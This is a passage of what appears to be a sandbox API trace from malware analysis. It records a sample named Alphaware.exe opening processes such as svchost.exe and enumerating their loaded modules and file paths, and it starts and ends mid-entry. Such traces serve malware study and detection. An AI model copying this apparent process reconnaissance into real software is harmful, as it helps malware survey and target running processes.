(cb=0x804) returned 0x782320 [0051.788] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xaa0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Program Files\\Uninstall Information\\coreftp.exe" (normalized: "c:\\program files\\uninstall information\\coreftp.exe")) returned 0x32 [0051.789] CoTaskMemFree (pv=0x782320) [0051.789] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x251b5c8, cb=0x18 | out: lpmodinfo=0x251b5c8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.789] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.789] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.790] CoTaskMemFree (pv=0x782320) [0051.790] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.790] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.790] CoTaskMemFree (pv=0x782320) [0051.790] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x251d788, cb=0x18 | out: lpmodinfo=0x251d788*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0051.791] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.791] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0051.792] CoTaskMemFree (pv=0x782320) [0051.792] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.792] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0051.792] CoTaskMemFree (pv=0x782320) [0051.792] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x251f948, cb=0x18 | out: lpmodinfo=0x251f948*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0051.793] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.793] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0051.793] CoTaskMemFree (pv=0x782320) [0051.793] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.793] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0051.794] CoTaskMemFree (pv=0x782320) [0051.794] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2521b18, cb=0x18 | out: lpmodinfo=0x2521b18*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0051.795] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.795] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0051.796] CoTaskMemFree (pv=0x782320) [0051.796] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.796] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0051.797] CoTaskMemFree (pv=0x782320) [0051.797] CloseHandle (hObject=0x218) returned 1 [0051.799] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0051.799] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x218 [0051.799] EnumProcessModules (in: hProcess=0x218, lphModule=0x2524240, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2524240, lpcbNeeded=0x41eb20) returned 1 [0051.804] EnumProcessModules (in: hProcess=0x218, lphModule=0x2524458, cb=0x400, lpcbNeeded=0x41eb20 | out: lphModule=0x2524458, lpcbNeeded=0x41eb20) returned 1 [0051.809] GetModuleInformation (in: hProcess=0x218, hModule=0xff760000, lpmodinfo=0x25248c8, cb=0x18 | out: lpmodinfo=0x25248c8*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0051.809] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.809] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff760000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0051.809] CoTaskMemFree (pv=0x782320) [0051.809] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.809] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff760000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0051.810] CoTaskMemFree (pv=0x782320) [0051.810] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2526ac0, cb=0x18 | out: lpmodinfo=0x2526ac0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.810] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.810] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.811] CoTaskMemFree (pv=0x782320) [0051.811] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.811] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.812] CoTaskMemFree (pv=0x782320) [0051.812] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x2528c80, cb=0x18 | out: lpmodinfo=0x2528c80*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0051.812] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.812] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0051.813] CoTaskMemFree (pv=0x782320) [0051.813] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.813] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0051.814] CoTaskMemFree (pv=0x782320) [0051.814] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x252ae50, cb=0x18 | out: lpmodinfo=0x252ae50*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0051.814] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.814] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0051.815] CoTaskMemFree (pv=0x782320) [0051.815] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.815] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0051.816] CoTaskMemFree (pv=0x782320) [0051.816] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x252d020, cb=0x18 | out: lpmodinfo=0x252d020*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0051.816] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.816] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0051.817] CoTaskMemFree (pv=0x782320) [0051.818] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.818] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0051.819] CoTaskMemFree (pv=0x782320) [0051.819] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x252f238, cb=0x18 | out: lpmodinfo=0x252f238*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0051.819] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.819] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0051.820] CoTaskMemFree (pv=0x782320) [0051.820] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.821] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0051.822] CoTaskMemFree (pv=0x782320) [0051.822] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x25313f8, cb=0x18 | out: lpmodinfo=0x25313f8*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0051.822] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.822] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0051.824] CoTaskMemFree (pv=0x782320) [0051.824] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.824] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0051.825] CoTaskMemFree (pv=0x782320) [0051.825] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x25335b8, cb=0x18 | out: lpmodinfo=0x25335b8*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0051.826] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.826] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0051.827] CoTaskMemFree (pv=0x782320) [0051.827] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.827] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0051.829] CoTaskMemFree (pv=0x782320) [0051.829] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x2535778, cb=0x18 | out: lpmodinfo=0x2535778*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0051.829] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.830] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0051.831] CoTaskMemFree (pv=0x782320) [0051.831] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.831] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0051.832] CoTaskMemFree (pv=0x782320) [0051.832] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x25379d0, cb=0x18 | out: lpmodinfo=0x25379d0*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0051.833] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.834] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0051.835] CoTaskMemFree (pv=0x782320) [0051.835] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.835] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0051.836] CoTaskMemFree (pv=0x782320) [0051.836] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x2539b90, cb=0x18 | out: lpmodinfo=0x2539b90*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0051.837] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.838] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0051.839] CoTaskMemFree (pv=0x782320) [0051.839] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.839] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0051.840] CoTaskMemFree (pv=0x782320) [0051.840] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x253bd40, cb=0x18 | out: lpmodinfo=0x253bd40*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0051.842] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.842] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0051.844] CoTaskMemFree (pv=0x782320) [0051.844] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.844] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0051.845] CoTaskMemFree (pv=0x782320) [0051.845] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x253df00, cb=0x18 | out: lpmodinfo=0x253df00*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0051.847] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.847] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0051.849] CoTaskMemFree (pv=0x782320) [0051.849] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.849] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0051.850] CoTaskMemFree (pv=0x782320) [0051.850] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x25400c0, cb=0x18 | out: lpmodinfo=0x25400c0*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0051.852] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.852] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0051.853] CoTaskMemFree (pv=0x782320) [0051.853] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.853] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0051.855] CoTaskMemFree (pv=0x782320) [0051.855] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x2542298, cb=0x18 | out: lpmodinfo=0x2542298*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0051.857] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.857] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0051.858] CoTaskMemFree (pv=0x782320) [0051.858] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.858] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0051.861] CoTaskMemFree (pv=0x782320) [0051.861] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x2544468, cb=0x18 | out: lpmodinfo=0x2544468*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0051.863] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.863] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0051.864] CoTaskMemFree (pv=0x782320) [0051.864] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.864] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0051.866] CoTaskMemFree (pv=0x782320) [0051.866] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc7a0000, lpmodinfo=0x2546638, cb=0x18 | out: lpmodinfo=0x2546638*(lpBaseOfDll=0x7fefc7a0000, SizeOfImage=0x196000, EntryPoint=0x7fefc7a78e4)) returned 1 [0051.868] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.868] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc7a0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wevtsvc.dll") returned 0xb [0051.870] CoTaskMemFree (pv=0x782320) [0051.870] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.870] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc7a0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll")) returned 0x1f [0051.871] CoTaskMemFree (pv=0x782320) [0051.871] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x2548910, cb=0x18 | out: lpmodinfo=0x2548910*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0051.873] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.873] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0051.875] CoTaskMemFree (pv=0x782320) [0051.875] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.875] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0051.877] CoTaskMemFree (pv=0x782320) [0051.877] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x254aae0, cb=0x18 | out: lpmodinfo=0x254aae0*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0051.879] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.879] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0051.881] CoTaskMemFree (pv=0x782320) [0051.881] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.881] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0051.883] CoTaskMemFree (pv=0x782320) [0051.883] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x254cca0, cb=0x18 | out: lpmodinfo=0x254cca0*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0051.885] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.885] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0051.887] CoTaskMemFree (pv=0x782320) [0051.887] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.887] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0051.890] CoTaskMemFree (pv=0x782320) [0051.890] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x254ee60, cb=0x18 | out: lpmodinfo=0x254ee60*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0051.892] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.892] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0051.894] CoTaskMemFree (pv=0x782320) [0051.894] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.894] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0051.896] CoTaskMemFree (pv=0x782320) [0051.896] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x2551020, cb=0x18 | out: lpmodinfo=0x2551020*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0051.897] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.897] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0051.899] CoTaskMemFree (pv=0x782320) [0051.899] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.899] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0051.901] CoTaskMemFree (pv=0x782320) [0051.901] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x25531e0, cb=0x18 | out: lpmodinfo=0x25531e0*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0051.902] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.902] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0051.904] CoTaskMemFree (pv=0x782320) [0051.904] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.904] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0051.906] CoTaskMemFree (pv=0x782320) [0051.906] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd010000, lpmodinfo=0x2555390, cb=0x18 | out: lpmodinfo=0x2555390*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0051.908] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.908] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd010000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0051.910] CoTaskMemFree (pv=0x782320) [0051.910] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.910] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd010000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0051.911] CoTaskMemFree (pv=0x782320) [0051.912] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca10000, lpmodinfo=0x2557550, cb=0x18 | out: lpmodinfo=0x2557550*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0051.913] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.913] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca10000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0051.915] CoTaskMemFree (pv=0x782320) [0051.915] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.915] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca10000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0051.917] CoTaskMemFree (pv=0x782320) [0051.917] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd000000, lpmodinfo=0x2559720, cb=0x18 | out: lpmodinfo=0x2559720*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0051.919] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.919] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd000000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0051.921] CoTaskMemFree (pv=0x782320) [0051.921] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.921] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd000000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0051.923] CoTaskMemFree (pv=0x782320) [0051.923] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb00000, lpmodinfo=0x255b8e0, cb=0x18 | out: lpmodinfo=0x255b8e0*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0051.925] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.925] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb00000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0051.927] CoTaskMemFree (pv=0x782320) [0051.927] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.927] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb00000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0051.929] CoTaskMemFree (pv=0x782320) [0051.929] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb800000, lpmodinfo=0x255daa0, cb=0x18 | out: lpmodinfo=0x255daa0*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0051.931] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.931] GetModuleBaseNameW (in: 